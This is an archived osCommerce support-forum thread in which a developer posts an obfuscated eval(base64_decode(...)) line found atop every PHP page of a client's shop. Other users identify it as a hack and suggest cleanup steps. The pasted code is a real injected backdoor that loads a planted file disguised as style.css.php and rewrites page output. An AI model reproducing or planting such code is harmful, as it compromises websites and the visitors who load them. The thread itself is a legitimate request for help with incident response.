lildog Posted October 3, 2009 Share Posted October 3, 2009 I had stepped away from OSC for awhile for personal reasons and have just returned and am working on an old clients shop. I have found a line of code on top of every php page and I do not recognize it. It is on all the catalog directory pages as well as includes pages, even all the language defines have it. here is the code I will omit a few chars so I am not giving away anything important. I do know the code has been encoded so I can't read it, I usually go WAY overboard on the comments and think I would remember inserting this in every page. Could it be required/inserted by her server? Maybe her ssl? I guess it could do just about anything. If anyone could help decode it so I can see what it is doing maybe I can figure out what it is doing. Thank you, lildog <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9kdWRzNGJ1ZC9wdWJsaWNfa HRtbC9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy 5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9kdWRzNGJ1ZC9wdWJsaWNfaHRtbC9hZG1pbi9pbmNsdWR lcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlv bl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc 3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRj A2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZ ENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5O ENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3Mz M5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCw yKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZD ODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0M jM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OT dCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU 5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0 NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q 0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRj A2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZ CNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4 ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1Y nN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QU I0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0U peyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4 MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jd GlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbn QtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2R lKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkv c2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlK CcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0Rk I5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU 5MDt9fW9iX3N0YXJ0KCdk')); ?> Link to comment Share on other sites More sharing options...
Jan Zonjee Posted October 3, 2009 Share Posted October 3, 2009 I have found a line of code on top of every php page and I do not recognize it. Is this topic relevant in this case? Link to comment Share on other sites More sharing options...
multimixer Posted October 3, 2009 Share Posted October 3, 2009 read -----> this My community profile | Template system for osCommerce - New: Responsive | Feedback channel Link to comment Share on other sites More sharing options...
Guest Posted October 3, 2009 Share Posted October 3, 2009 Unfortunately your site has been hacked. You will need to take the steps indicated by Fimble as indicated in the links in the posts above. Link to comment Share on other sites More sharing options...
birdmantx Posted October 4, 2009 Share Posted October 4, 2009 Ive just been hacked too. Same malicius code. This really sucks. Ive spent so many hours getting my site perfect. Flying away to get back to work. Link to comment Share on other sites More sharing options...
birdmantx Posted October 4, 2009 Share Posted October 4, 2009 Ive just been hacked too. Same malicius code. This really sucks. Ive spent so many hours getting my site perfect. Flying away to get back to work. Link to comment Share on other sites More sharing options...
satish Posted October 4, 2009 Share Posted October 4, 2009 yes You are hacked. rename admin. delete filemanager code as well. Satish Ask/Skype for Free osCommerce value addon/SEO suggestion tips for your site. Check My About US For who am I and what My company does. Link to comment Share on other sites More sharing options...
lildog Posted October 5, 2009 Author Share Posted October 5, 2009 Thank you all for the replies. I will fix my code accordingly. BTW, I only discovered this because the images from my clients thumbnail contrib were not showing, I removed the code and the thumbs are back. lildog Link to comment Share on other sites More sharing options...
FIMBLE Posted October 5, 2009 Share Posted October 5, 2009 Todd, Did you decode the script to find the files planted on your server? Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
FIMBLE Posted October 5, 2009 Share Posted October 5, 2009 Todd, Did you decode the script to find the files planted on your server? Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
lildog Posted October 6, 2009 Author Share Posted October 6, 2009 Yes I did. There were 66 files in the admin/includes/languages/english/modules/index directory. I think that was it. The big problem is someone worked on her store before me and it is really messy. Todd Todd, Did you decode the script to find the files planted on your server? Nic Link to comment Share on other sites More sharing options...
FIMBLE Posted October 6, 2009 Share Posted October 6, 2009 Yes I did. There were 66 files in the admin/includes/languages/english/modules/index directory. I think that was it. The big problem is someone worked on her store before me and it is really messy. Todd hmmm lovely! Glad you got it sorted anyhow, well the hack code good luck with the rest Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.